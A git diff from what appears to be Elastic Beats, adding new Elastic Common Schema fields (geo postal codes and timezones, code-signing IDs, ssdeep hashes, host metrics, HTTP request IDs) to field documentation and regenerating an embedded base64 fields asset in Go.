+ *`client.geo.continent_name`*:: + -- @@ -1228,6 +1248,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -1250,6 +1282,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -1263,9 +1306,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -1580,6 +1626,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -1597,6 +1655,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -1620,6 +1690,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -1786,6 +1868,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -1843,6 +1936,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -1865,6 +1970,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -1878,9 +1994,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -2099,6 +2218,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -2122,6 +2253,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -2182,6 +2325,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -2927,6 +3079,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -2950,6 +3114,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -3098,6 +3274,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -3588,6 +3773,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -3645,6 +3841,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -3667,6 +3875,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -3704,8 +3923,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -3744,6 +3964,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -3762,6 +3991,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -3785,6 +4043,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -3842,6 +4111,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -3864,6 +4145,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -3897,10 +4189,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -3913,6 +4208,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -4190,6 +4521,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -4723,7 +5066,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -4787,7 +5130,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4806,6 +5149,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -4863,6 +5217,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -4885,6 +5251,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -4897,7 +5274,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -4961,7 +5338,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4981,10 +5358,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -5554,6 +5934,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -5577,6 +5969,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -5699,6 +6103,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -5753,6 +6166,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -5776,6 +6201,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -5898,6 +6335,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -6636,6 +7082,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -6693,6 +7150,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -6715,6 +7184,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -6728,9 +7208,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -7098,6 +7581,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -7155,6 +7649,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -7177,6 +7683,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -7190,9 +7707,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/journalbeat/include/fields.go b/journalbeat/include/fields.go index 7ba781952a9..48d04fdf41d 100644 --- a/journalbeat/include/fields.go +++ b/journalbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "eJzs/XtzGzmSKIr/358CP23ET/YsVSL1sqx7J+KoJXW3Yv3QWPL0bI83JLAKJDGqAqoBlGj2if3uN5AJoFAPSZQt2m6PZs9xi2QVkEgk8oV8/Af59fDdm9M3P///yLEkQhrCMm6ImXFNJjxnJOOKpSZfDAg3ZE41mTLBFDUsI+MFMTNGTo7OSankv1hqBj/8BxlTzTIiBXx/w5TmUpBRsp8Mkx/+g5zljGpGbrjmhsyMKfXB5uaUm1k1TlJZbLKcasPTTZZqYiTR1XTKtCHpjIopg6/ssBPO8kwnP/ywQa7Z4oCwVP9AiOEmZwf2gR8IyZhOFS8NlwK+Ij+5d4h7++AHQjaIoAU7IOv/x/CCaUOLcv0HQgjJ2Q3LD0gqFYPPiv1eccWyA2JUhV+ZRckOSEYNfmzMt35MDdu0Y5L5jAlAE7thwhCp+JQLi77kB3iPkAuLa67hoSy8xz4aRVOL5omSRT3CwE7MU5rnC6JYqZhmwnAxhYnciPV0vRumZaVSFuY/nUQv4G9kRjUR0kObk4CeAZLGDc0rBkAHYEpZVrmdxg3rJptwpQ283wJLsZTxmxqqkpcs56KG653DOe4XmUhFaJ7jCDrBfWIfaVHaTV/fGo72Noa7G1vbF8P9g+HuwfZOsr+7/dt6tM05HbNc924w7qYcWyqGL/DPS/z+mi3mUmU9G31UaSML+8Am4qSkXOmwhiMqyJiRyh4JIwnNMlIwQwkXE6kKagex37s1kfOZrPIMjmEqhaFcEMG03ToEB8jX/u8wz3EPNKGKEW2kRRTVHtIAwIlH0FUm02umrggVGbm63tdXDh0dTP7fNVqWOU8BurUDsjaRcmNM1dqArDFxY78plcyqFH7/3xjBBdOaTtkdGDbso+lB409SkVxOHSKAHtxYbvcdOvAn+6T7eUBkaXjB/wh0Z+nkhrO5PRNcEApP2y+YClix02mjqtRUFm+5nGoy52YmK0OoqMm+AcOASDNjyrEPkuLWplKk1DARUb6RFoiCUDKrCio2FKMZHeeM6KooqFoQGZ24+BgWVW54mYe1a8I+cm2P/Iwt6gmLMRcsI1wYSaQIT7c38heW55L8KlWeRVtk6PSuExBTOp8KqdglHcsbdkBGw62d7s694trY9bj3dCB1Q6eE0XTmV9mksX/GJIR0tbX2PzEp0SkTSCmOrR+GL6ZKVuUB2eqho4sZwzfDLrlj5JgrJXRsNxnZ4MTM7emxDNRYATdxW0HFwuKc2lOY5/bcDUjGDP4hFZFjzdSN3R4kV2nJbCbtTklFDL1mmhSM6kqxwj7ghg2PtU+nJlykeZUx8iOjlg/AWjUp6ILQXEuiKmHfdvMqnYBEg4Umf3FLdUPqmWWSY1bzY6BsCz/lufa0h0hSlRD2nEhEkIUtWp9yQ85nTMXce0bLklkKtIuFkxqWCpzdIkA4apxIaYQ0ds/9Yg/IKU6XWk1ATnDRcG7tQRzU8CWWFIjTRMaMmiQ6v4dnr0EncZKzuSC347QsN+1SeMoSUtNGzH0zyTzqgO2CokH4BKmFa2LlKzEzJavpjPxescqOrxfasEKTnF8z8l90ck0H5B3LONJHqWTKtOZi6jfFPa6rdGa59Cs51YbqGcF1kHNAt0MZHkQgckRhUFfq0zGueJ4lnk+5Wdonuu9M33qq2yfp5KNhIrPi2U7VQNnE7Tvukadlp8ggu7YajXADGBlOIRWLnvHgpFFEOOofYUh7Akolb3jGBlYh0SVL+YSnBN8GxYfroJ45DEacpmBG8dTSTtBFXyR7yZA8o0W2t/N8QHI+hp/x63/u0a1ttj/Zn2wPJ7vD4WhMt3d22A7b3cn2s5fpeH8rHY+GL9IAol2PIVvDreHGcGtjuEu2tg9Gw4PRkPzncDgckvcXR/8TMDyhVW4uAUcHZEJzzRrbysoZK5ii+SXPmpvK3HY8wsb6OQjPLOebcKaQK3DtzsczPgHBAtJHP29vMbcaiipA6/OKOU2V1HYjtKHKsslxZcgVUgjPruCY2QPW3aF9umMRPWkgor38x6Hp94L/btXWh687qFGW8yC/gvfmoK+NGQHuxHsI0C0vayzP/ruKBTptFNhmzOg7O6gJxadQyqFmMeU3DNRRKtxr+LT7ecbyclLlljdaDuBWGAY2c0l+cnyacKENFalTT1tiRtuJQdZYInFaEqm1JFZSBZwhjM01EYxlaFfOZzyddacKDDuVhZ3Mmk3Ruk8nln94gQJLRUnjv5ITwwTJ2cQQVpRm0d3KiZSNXbQbtYpdvFiUd2yfF2J2AkLzOV1ooo39N+DWqvh65kkTt9VZWfiuVdKSGjUiiOKA1fpZJHE30ZjVj4BmwieNja93rE0Ajc0vaDqzpl4XxfE4Hs+Oca8A1X93IqGJ7BZMe8kwGW6odCvWTnVDNa2MFLKQlSbnIOnvUVMPBaH1K6gckGeH58/xYDql0wGWSiEYOAJOhWFKMEPOlDQylV7uPzs9e06UrEAalopN+EemSSUyhnLaSl8lczuY5W5SkUIqRgQzc6muiSyZokYqq8d6253NaD6xL1Bi1ZicEZoVXHBt7Mm88TqzHSuTBSrY1BDnjsBFFIUUA5LmjKp8UUtAsF0CtDLn6QLshRkDlcEuMFlaDxJVMQ566l2iMpdBGWtshRMJOA6heS5T0JkdRJ1tcmpk+DoQvNtFN9Czw/M3z0kFg+eLWuJotIkC6vFMnDbWHZHeaHe097KxYKmmVPA/gD0mXTHyOWoCWJ+XMZYjVufNdtK15AmozqrQsUZD7lJ3WnvwNloTzNfBw89SWhp89eooOoNpzlsm4lH9zR024qF70x42T49UOwLkhtuzgKTvt8kdQaf7euDQ9lNsSlUGNoFV+aXQg+h5tAfGHL2oXAqak0ku50Sx1JrLDY/ExdGZGxUlUw1mBzb7hX08ggwOoGYiWIL2mfP/fkNKml4z80w/T2AWdGKUjoV0pkJvoVXtGpN6E1aBrs20hcMZWR5LRlGhKQCTkHNZsGD2VBrNR8NUQda8C1SqtdphotjEcysHimgtUOPRcz878x53dsyCeQvmfYQAdywtWGLqt7meIoYfHRWOiPwEVnpVurIIcaPWdjUXFrx/VQI3AMxsNJy9g7pnsBq/QprOkFaxwv3agBPtPYPBn4jjbfp5ggcYDg+qajTLiGYFFYanwPvZR+O0OvYR9fUBKlGeI+ig2xlJbrhdLv+D1T4Tu1CmwILT3FTUbcfphCxkpcIcE5rnnvi8RLDcdCrVYmAf9UqJNjzPCRO6Uk4DdW5nq7hkTBtLHhalFmETnueBodGyVLJUnBqWLx5gL9MsU0zrVdlUQO3oHHG05SZ0+k9gM8WYTytZ6XyB1AzvBIY5t2jRsmDgbic51+COPD0bWPMY5axUhFrB8pFoaekkIeS/a8wGfbDWjvAcKDr3MHm6v0rcF1eIsqaWKQg3kRKZVegSRtF4lfDyyoJylSBYVwOSsZKJzKn5qKNLUQMBnhq3Y7UWlfzbCXCqkycZHnuyFobpe1T7aO/R79N8rQHIj/YHdNqFizN3Jh1JIOvsbtX+TgMwJOwVGB2Oh+P4SWPOKZNJys3ickUOgiOrs/fuzmtrIzDnSmyAI4XhggmzKpjeRM6KMFkHvjdSmRk5LJjiKe0BshJGLS65lpepzFaCOpyCnJ6/JXaKDoRHh7eCtarddCD1bugRFTTrYgrY4/3G9JTJy1LyIJuadz5STLmpMpTXOTXwoQPB+v8lazncIG682E72Rjv728MBWcupWTsgO7vJ7nD35Wif/O96B8jH5YktH6BmasPL4+gn1Pg9egbE+UBQC5MTMlVUVDlV3CxiwbogqRXwoHZGAvTIy83gYUIK5wo1qpRZieGU70kupXKCZwAelRmvVdtaQiF4OSlnC83tH/7iKvXHWkcgvJEmup2HazmOfocCBOSUSb/arh9mLLWRYiNLO3uj2JRLscqT9g5muOugbfzt6Da4VnTUHEy9J+1vFRuzJqJ4eQ8M4YHGLKdnQUfzDBFlxbPTs5sdq2+dnt3sPW/KjIKmK1jw68OjfliakwtqkvZie89q/4LXL6zNiKbP6ZmdyBkCGET05vAiWNXkGUumiXMR0Ty2/gmakN571LivCAcgMiStpQo+RTEluaQZGdOcihTO44QrNrd2DBjuSlb2mLbUVrvoUirzMK3Vay7aKN6vysbYsOP/WfCBBusDlLjGqs/w7U9S2baacHT2ZBlN8vb9OHN7cBvxW5ajDVMsu+xTFh9PZlmLZcanM6ZNNKnHEc49gIWUJcs8yLoaex0z7P9P9cUNyp5oOGdgTqSCkJ/EPZekslgjXJO1+Iv2jRIGP7mboowZpgqQsKViKdfWhAL3CEWjFq7NIeirGuc8JbqaTPjHMCI882xmTHmwuYmP4BPWdHqekAu1sLRqJPoDPnIr0VBqjhdE86LMF8TQ63pf0QjOqTZwXYGRT2hvC2kI2HJzluew+otXx/VV/Voqk+p6rSsiI2w0qCKgfZXUECYBog/qy6SyR/v3iubWVg1bildcGGISqRN57kkFdAfCPqasNHUkCLxWXyN0yD2BqyNKSqoMjzxkpAMBMA+Oc9n/735H7aPWsUAZquye2JlTKmoXGWnS1SDCQAgN6yxozHI57yfz/jPRPDcxbtfm83nCqDZJsXAjIGHgyaDarEUXagiEG2VGdR3ZBWsFkRqmGdS0pqvxVqKr8ahx+AYNIq7Bw1AL56PxIRb1GGsDPHNCWgbPc7hvYYrLnltqu4BAbPcEKRhZXsIyvgDXY5OJFVI3zM7qCMWt/hm7eHX8fIDXkNdCzoV37zbAIo65DLwfHZiAJVlPK9EhSboMsj1vGDa6A7e7BHTw5+aMwBVvY4r1TizHHuH7Bt1UmqlktSQT+xLwykUqvMiwk+PtasHAwScnt4lFKsir48MziM3CFR+HoWJaWe+ujhWU5ytanDVcCUzgFfOkC4Dlnj020J/SpWgXvK5rgQCmMb2hPKfjvGuGHeZjpgw54UIb5kisgRu4IfhqBAizr54CcZErix7rRlD5YEBcnw/yAF/6ZplTY9XsHkJFOFfo6Il3AifrAjGjerYyPxNiCviOnQfDIJVi1r7rhFNSx6AEoUKKRRzPjpZKRCrvNXNhWFewCp7hVQx8sKu7CspAKsUE94rmjTmpyHr0KwgL6iGqlUTj3RKMhyjr2azH8+x8NY52PrMWJboDIdiZi+6iI5ZGgaV1UaFk3r4zeTTCPVSKQoYCECTM5H2hkMTTzF1oAbz+z7VrPqaCXkK40NqArCkGWrSYXtoBMcb/DpzVwR2yQsBDbIf/4vbQDkzxInjGwhUgDAUGiJgoGtI+6mXgHS2GDXrnAAQPklsD2CfkdR1YzHUc4UgFOTnaQgvKHrMJM+mMafD7RqMTbrTLGaiBtEe0merSyFngOkTONUFw46pKuGQExQppQpwdkZXRPGPRTG3IECZKXLS8X5AnHVG/6nzWzawcHLQeCNIC3OTegWOH5boG1SHsIbf4KdyorE68rV/UCMK5IB0ivtvkWUhxcaxrQTI+mTAVu9/AM88hscMKfMtwNgwTVBjCxA1XUhTNuM6atg5/PQ+T82zg702B/snbdz+T0wyTUCCOp2pz0a4mvre39+LFi/39/ZcvX/aic5XXLV2EevZHc071HbgMOAw4+jxcogrZwWbGdZnTRaxQxXYxpqNuZOxmWfPYaag852Zx+UcdAvHojDqah9h5LH4w7gI4BTCgmjV1eHWlN6zVvzFqXV24wN3VHbJTH7B9euylCcDqWVsbUL4x2tre2d17sf9ySMdpxibDfohXSMcB5ji0vgt1dCcDX3YjxB8Noteeu0bB4nei0WwlBct41fRWusTtL8JS3Vwxs+o7tI0jehbeGZDDP6zYrr/pyfZZbLhJlj2tfv1fhgd6DOA94rJrR87VXH0/uyoW5OHrv+HZUhFYnx3c4VEAEyZ+1XEeM53rAaF2oQMyTcva8SkVyfiUG5rLlFHR1ZTnurEsvA1e0aLcZfAnsttYyZUZu9R8KqhVSBvarswYOW/8crvaezFjmrUTXhvWHuiPYy6oWsCkJEyql4+1x6yoe0ywsZQ5o6IPbT/iT2AI0xJUcI4JBg4Wiz4Xztq1LIyq2D22Q3QHY6ipVhbteZhl3MVyd7EMlM6UwesN5kDpScCq0Ix3aa9TqwynalEaOVW0nPGUMKWkwrz0zqg3NOdZHIoiFTGq0sbPR14xesNIJaJwZTyG/tX6FX8+6/HDsHOrool0xtLrvuzKk3fv3r67fP/m4t3784uT48t3b99eLL1HFVZYWFHExjkO3xDYgfQDv6vj33iqpJYTQ46kKmUj/+z+GxGLRraMBL3jeKyfG6kYWn3xVvZsD0lnzSusv9s9pRDiXr9+23uQVIuFBHxM7wDsQcvHwpCNyyUp8kUzp3y8IEbKXLvkXfBSQjooS6/R4kM67JDMww4yEOtn4rWf76CHFkRKkwPdMIVXl3RqTdvIGzRjNQ8Vpmlz9B432kD+PWdpGcTUggOYvCPjIDPiL+9IgAkPNpMcXPpBpz5JVDHBZV87IAMUSATufs1FrMhJPEhU7CaSVTOWl5FTFNwHGOkShtbOMSEWVrIaHrSeZSTWKv2W9eJ51lT+eUGnKzVGYqUKJguxswiQJTTMSpeiDzRDpyuCrKYsBxedtm6pohI8d08fleK5oxhP20yDWV1dm8a8K9yOetF1eGDQQ5FmV6WI4uikoIJOkflzXRNCR4nCEkARH4lybWJOctz6+g5eEj1aF8ZBJttIyXJRGFDyqZldF4DE1KRNjCZLmpzCcqgoSwp9lY3ErYELQxuQOlkNPGQuLQeRYpEUVUKhvclrnlf1rC1KB7svEQzZ4CRUHXPc77ZUp2iCVAptTSSWocyhGgpjxWndmOfjRh37JCmQOaK5Yn3bhB4NTWR6moxz+RoFwiDcIoztTXkXydOMWgV440IycJsA/mPR/5zHQlillg2145vM+GokrC2V9hW0BlcN7ZHSvsKwkP71lPb1lPb17532FR9MH0jsSh+29+tL5X7FIuUpAewpAexxQHpKAFseZ08JYE8JYH+iBLBYhn0TWWARQCtLBeOlnS1e+j35T6yR+FQqfkMNI8evf3vel/oERwGMtG8q+wvSjSIPmlsp+NVq3BhJxgvAxDGDupaPv8JV5HM9QBf7ckldt9Ly187syjpq4lN611N611N611N611N611N611N611N616MB8ZTe9SgE+JTe9ZTe9ZTe9ZTe9ZTedSfOwgVLjnLUBxy8egUf7+7sskyQK4T45XysqOJMk2whaIFOEY9QSTPfPMf16QCvqfv5NRULVxE77vPhytNKsqZnFGqvNOZZcz1WQu4KGChesR9XoaEaaPTM4HjQziyyaiYyz+Wci+mBh+Yv5BgXsJFzce3mW5BnV0mW51fPXZFt7/CRgvzKRSbnun7/HMF9i8GQz64SLfveey/4xw1QTjtr78DSAGOR83HfgAVN354vf1vfjIRO/kShxi3InyKPv/3I4/aWfT+ByK2VPcUlryouuYXopzDlW/BkVeOkyHZXxBBfH+/iFA+CR8/oaEUAnf9yOPo0iLZ291YH09bu3qdBtetuY1YC1e5o62FQrYhDN8x6p9y0xWZdtr+gpfZXWDFPh265UpCM6+vusblmSrB8eyvxmu8yuXnUrMp+/anKc4TYTtJZewv4o4MPTrH8gP1ttrc+fNKCWEJVOuOGpSGtbQXx2GfvSTwNMVRNmQmuDLvszhI/7u08YBVWRFGxWNECTkNNT5ymQ2YDn0WZEehRWZQ8ZxuQHPGo6kTJkgiwVa+2FYvzCYs9o3HA0v2Ls8Nf9naXevzV3TRbTT1wZXvJdvJybzhMRi92RrsPWCIvylW6wQ7R+RWSUUqpjCt6cXaCJ40cCuKgIBsbcFMIj5EILmJ/SZu9kidcTJkqFRcudZW7hquETgy0PkGMuchzXxDDambYO6XWiBQVOlhLmsysDiTTtFLKqpgYtIxtzlz7T+iPZRQN1hZAj4nKTW1KCXyY1t3M5/N5MuGKsQUwis1xLqebZqYYNRvW5LS8aXNrONrZHI42jaLpNRfTjYLmc6rYBiJnw07IxTSZmSLvSpNhurc/3E532MutrZH9I0vp7su9bUqz7b0smzyAQHwP0Us4DCstoeBOwudws/Ozw9M3F8nJP04esETXanjV63LTfM761gK7/vDx8MR7c+Dvt8EvgyJ47W4EBEebaHSqO35zDh/vcLT91OisZCc8fnNOfq8YHEBrj1Gh5yxqcm5/d4WUnF3GO